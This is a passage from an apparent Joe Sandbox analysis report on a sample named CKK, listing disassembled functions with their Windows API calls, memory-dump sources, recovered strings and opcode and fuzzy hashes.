                                                                                              • Instruction ID: 6b6501745b4561eb765b95c9015de99bde43fdb4f7a160be3ab1dc640cc903f4
                                                                                              • Opcode Fuzzy Hash: 8db95134c3464875cf6279ff2d022b20e94b1f8f8abfc891a1cbb4621bc3d633
                                                                                              • Instruction Fuzzy Hash: E711E776684B06B9F6056334DC06EE7379CFF1A365B200226FE04A50D2FA7158465B54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                              • String ID:
                                                                                              • API String ID: 1282221369-0
                                                                                              • Opcode ID: 4c890f990deb854d1322e571dfc1aef65392108d8ca7b4132d33e30383f45bf8
                                                                                              • Instruction ID: 373ab02d275235e8d4c2844b0e193493342e925d4b19074a8e30a7b7fcf99091
                                                                                              • Opcode Fuzzy Hash: 4c890f990deb854d1322e571dfc1aef65392108d8ca7b4132d33e30383f45bf8
                                                                                              • Instruction Fuzzy Hash: 70612571A04360AFDB21AFBCBE81F6E7BA5AF05320F15427DF94697282E6319D418790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00A85186
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00A851C7
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00A851CD
                                                                                              • SetFocus.USER32 ref: 00A851D1
                                                                                                • Part of subcall function 00A86FBA: DeleteObject.GDI32(00000000), ref: 00A86FE6
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A8520D
                                                                                              • SetWindowLongW.USER32 ref: 00A8521A
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A8524D
                                                                                              • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00A85287
                                                                                              • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00A85296
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                              • String ID:
                                                                                              • API String ID: 3210457359-0
                                                                                              • Opcode ID: 842fe4d40f2a687816dc03e392111dfbfc81c80262e44ac6e2baa12898339b92
                                                                                              • Instruction ID: c8bd69804b46a7ef6c9bfc55d99aa690911ba4a3212d56c8609b22dd9ddcf88f
                                                                                              • Opcode Fuzzy Hash: 842fe4d40f2a687816dc03e392111dfbfc81c80262e44ac6e2baa12898339b92
                                                                                              • Instruction Fuzzy Hash: B8519D30E50A08FEEF20BF74CC4ABD93B65BB05321F144211FE15962E1EB75A990DB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadImageW.USER32 ref: 00A46890
                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00A468A9
                                                                                              • LoadImageW.USER32 ref: 00A468B9
                                                                                              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00A468D1
                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A468F2
                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A08874,00000000,00000000,00000000,000000FF,00000000), ref: 00A46901
                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A4691E
                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A08874,00000000,00000000,00000000,000000FF,00000000), ref: 00A4692D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 1268354404-0
                                                                                              • Opcode ID: 0068ab4aac43c175d37fac0cc4d617953cc8c831d88b84f11cd8a53f7e720acd
                                                                                              • Instruction ID: 4692fc5964f29cccde16d2791db90876c10be8e76417ab5ad5e6ba74966558e8
                                                                                              • Opcode Fuzzy Hash: 0068ab4aac43c175d37fac0cc4d617953cc8c831d88b84f11cd8a53f7e720acd
                                                                                              • Instruction Fuzzy Hash: 9A518774600209EFDB20CF64DC95FAA7BB5FB8A760F104528F982972E0DB74E991DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A6C182
                                                                                              • GetLastError.KERNEL32 ref: 00A6C195
                                                                                              • SetEvent.KERNEL32(?), ref: 00A6C1A9
                                                                                                • Part of subcall function 00A6C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A6C272
                                                                                                • Part of subcall function 00A6C253: GetLastError.KERNEL32 ref: 00A6C322
                                                                                                • Part of subcall function 00A6C253: SetEvent.KERNEL32(?), ref: 00A6C336
                                                                                                • Part of subcall function 00A6C253: InternetCloseHandle.WININET(00000000), ref: 00A6C341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 337547030-0
                                                                                              • Opcode ID: d1a5b67fceac2ef3fbe72f3a00f523a288c4685a14f56c0f2489c6f6bb7c0760
                                                                                              • Instruction ID: 3a103a9f75f9f722bbfe16b010903361d4c0bf0e2a0d43954026f6078975f4ec
                                                                                              • Opcode Fuzzy Hash: d1a5b67fceac2ef3fbe72f3a00f523a288c4685a14f56c0f2489c6f6bb7c0760
                                                                                              • Instruction Fuzzy Hash: 05317871200705AFDB21AFF5DD54AB6BBF8FF18320B00852EF99A86611D731E8159FA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A53A57
                                                                                                • Part of subcall function 00A53A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00A525B3), ref: 00A53A5E
                                                                                                • Part of subcall function 00A53A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00A53A65
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A525BD
                                                                                              • PostMessageW.USER32 ref: 00A525DB
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00A525DF
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A525E9
                                                                                              • PostMessageW.USER32 ref: 00A52601
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00A52605
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A5260F
                                                                                              • PostMessageW.USER32 ref: 00A52623
                                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00A52627
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2014098862-0
                                                                                              • Opcode ID: 1cfe3cc9a76a43786ebe07b4b92d5e3e5b44a389a0c6027398439f56bea3b29c
                                                                                              • Instruction ID: 04612b3dc6e01b4db36258213c8b57d44cc06b6472eca422d81a273923e39994
                                                                                              • Opcode Fuzzy Hash: 1cfe3cc9a76a43786ebe07b4b92d5e3e5b44a389a0c6027398439f56bea3b29c
                                                                                              • Instruction Fuzzy Hash: B701B531290220BBFB10A7A89C8EF593F59EB4AB62F100011F714AE0D5C9F214498F79
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00A51449,?,?,00000000), ref: 00A5180C
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00A51449,?,?,00000000), ref: 00A51813
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A51449,?,?,00000000), ref: 00A51828
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00A51449,?,?,00000000), ref: 00A51830
                                                                                              • DuplicateHandle.KERNEL32 ref: 00A51833
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A51449,?,?,00000000), ref: 00A51843
                                                                                              • GetCurrentProcess.KERNEL32(00A51449,00000000,?,00A51449,?,?,00000000), ref: 00A5184B
                                                                                              • DuplicateHandle.KERNEL32 ref: 00A5184E
                                                                                              • CreateThread.KERNEL32(00000000,00000000,00A51874,00000000,00000000,00000000), ref: 00A51868
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 1957940570-0
                                                                                              • Opcode ID: af03a568292ad303fe78e401b85628f887806367c03920611d701264114aedec
                                                                                              • Instruction ID: 8a476b135bcb864d10ea6e3ba0e00127c4b2c513f93ba439ea96e7635e1115e6
                                                                                              • Opcode Fuzzy Hash: af03a568292ad303fe78e401b85628f887806367c03920611d701264114aedec
                                                                                              • Instruction Fuzzy Hash: 7101A8B5240308BFE610EBA5DC8DF6B7BACEB89B11F004511FA05DB2A1DA7198018F30
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A5D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00A5D501
                                                                                                • Part of subcall function 00A5D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00A5D50F
                                                                                                • Part of subcall function 00A5D4DC: CloseHandle.KERNEL32(00000000), ref: 00A5D5DC
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A7A16D
                                                                                              • GetLastError.KERNEL32 ref: 00A7A180
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A7A1B3
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A7A268
                                                                                              • GetLastError.KERNEL32(00000000), ref: 00A7A273
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A7A2C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                              • String ID: SeDebugPrivilege
                                                                                              • API String ID: 2533919879-2896544425
                                                                                              • Opcode ID: a7bd61c66fa04e6061b6a250ff2d973503172a65afbf9b51305469b092469b9c
                                                                                              • Instruction ID: a109e115bd8b8734d9f6466bed9daad8fa226294436b54139fb7fc837fc2a9c3
                                                                                              • Opcode Fuzzy Hash: a7bd61c66fa04e6061b6a250ff2d973503172a65afbf9b51305469b092469b9c
                                                                                              • Instruction Fuzzy Hash: 26619171204242AFD710DF14C894F69BBE1AF94318F54C49CE45A4B7A3C776ED46CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A83925
                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00A8393A
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A83954
                                                                                              • _wcslen.LIBCMT ref: 00A83999
                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A839C6
                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A839F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window_wcslen
                                                                                              • String ID: SysListView32
                                                                                              • API String ID: 2147712094-78025650
                                                                                              • Opcode ID: c6fc024d7137658fca27086c59422ea2ecb504ad2156b14a835c2ae17fcbf062
                                                                                              • Instruction ID: b81b6affa4bbdefbcf992cc9b260c60465b9dc063b2d3126a22a77129912fd78
                                                                                              • Opcode Fuzzy Hash: c6fc024d7137658fca27086c59422ea2ecb504ad2156b14a835c2ae17fcbf062
                                                                                              • Instruction Fuzzy Hash: 54419372A00219ABEF21EF64CC45FEE7BA9FF48750F100526F958E7281D7759A84CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoad
                                                                                              • String ID: blank$info$question$stop$warning
                                                                                              • API String ID: 2457776203-404129466
                                                                                              • Opcode ID: 0d68fcb729c682df3646f67b15fc331918b2471761d4b1dbb366980842b06d7e
                                                                                              • Instruction ID: fb29a08e5bdc26a79feb4254380259477cd12c9a3f2df60b137f40a6daea7504
                                                                                              • Opcode Fuzzy Hash: 0d68fcb729c682df3646f67b15fc331918b2471761d4b1dbb366980842b06d7e
                                                                                              • Instruction Fuzzy Hash: EF110D32689306FEE7019B549C83DEA67ACFF15776B60042AFD00A62C3DB745D845264
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$LocalTime
                                                                                              • String ID:
                                                                                              • API String ID: 952045576-0
                                                                                              • Opcode ID: 31c59f9e9dc275ec0b2511da46916e0566a2ece49b2bfd35aa078a9c3711e7e6
                                                                                              • Instruction ID: b3697775154fc1a7b0f0d3f9375560bcedba09ce9a1069ec58119fe3e72bf2e8
                                                                                              • Opcode Fuzzy Hash: 31c59f9e9dc275ec0b2511da46916e0566a2ece49b2bfd35aa078a9c3711e7e6
                                                                                              • Instruction Fuzzy Hash: A0418266C1021875DB11EBF4898A9CFB7BCAF45710F508562E928E3122FB34E795C3A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ShowWindow.USER32(FFFFFFFF,000000FF), ref: 00A0F953
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000006), ref: 00A4F3D1
                                                                                              • ShowWindow.USER32(FFFFFFFF,000000FF), ref: 00A4F454
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1268545403-0
                                                                                              • Opcode ID: a3f987fbb3cabcf882b4ac2d007ddcbdc70ea7c5de6a8a8a4474c8c9f0c87317
                                                                                              • Instruction ID: c0cff00e696f84667406bf07b4391057860180f6764d7f6bc3f153191ef70ac1
                                                                                              • Opcode Fuzzy Hash: a3f987fbb3cabcf882b4ac2d007ddcbdc70ea7c5de6a8a8a4474c8c9f0c87317
                                                                                              • Instruction Fuzzy Hash: BC414D35208684BEC738CF38FC88B2A7BA1ABC6360F14503DE05776DE1D631A881CB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A82D1B
                                                                                              • GetDC.USER32(00000000), ref: 00A82D23
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A82D2E
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00A82D3A
                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A82D76
                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A82D87
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A82DC2
                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A82DE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3864802216-0
                                                                                              • Opcode ID: cf5d20de9bad2933f46632abec5898fcfdede146a538801fdba9a4d1b9d9db0e
                                                                                              • Instruction ID: f2798782688ce3f34796bfb76dede656a6d358a39499249842b601b1775aa3d8
                                                                                              • Opcode Fuzzy Hash: cf5d20de9bad2933f46632abec5898fcfdede146a538801fdba9a4d1b9d9db0e
                                                                                              • Instruction Fuzzy Hash: 11318B72201214BBEB119F908C8AFFB3FA9EF09761F044065FE089A291D6799C41CBB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: df41f70cee6ea0de7884939a6eb8c6be6e81115f1c4a01241f8c70db97111398
                                                                                              • Instruction ID: 724b9770c3f68bcfe2a86366be545b16bf01277d54488ef7ea58845cf5416ef4
                                                                                              • Opcode Fuzzy Hash: df41f70cee6ea0de7884939a6eb8c6be6e81115f1c4a01241f8c70db97111398
                                                                                              • Instruction Fuzzy Hash: 8121AAB1E41909BBD21466318EA2FFA335DBF24386F580420FE045E945F730EE1886A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                              • API String ID: 0-572801152
                                                                                              • Opcode ID: aae360271a2e3643b8f5ed7d9a4c6db88337f5245b29b4243eb236f271b4245d
                                                                                              • Instruction ID: 7f369ac136e3e1a6b761af1bc55be8ca4829f967cce6dccc5f8352382f6b6e1a
                                                                                              • Opcode Fuzzy Hash: aae360271a2e3643b8f5ed7d9a4c6db88337f5245b29b4243eb236f271b4245d
                                                                                              • Instruction Fuzzy Hash: 81D1B071E0060AAFDB10DFA8CC90BAEB7B5BF48344F14C569E919AB291D7B0DD41CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00A317FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00A315CE
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A31651
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A317FB,?,00A317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A316E4
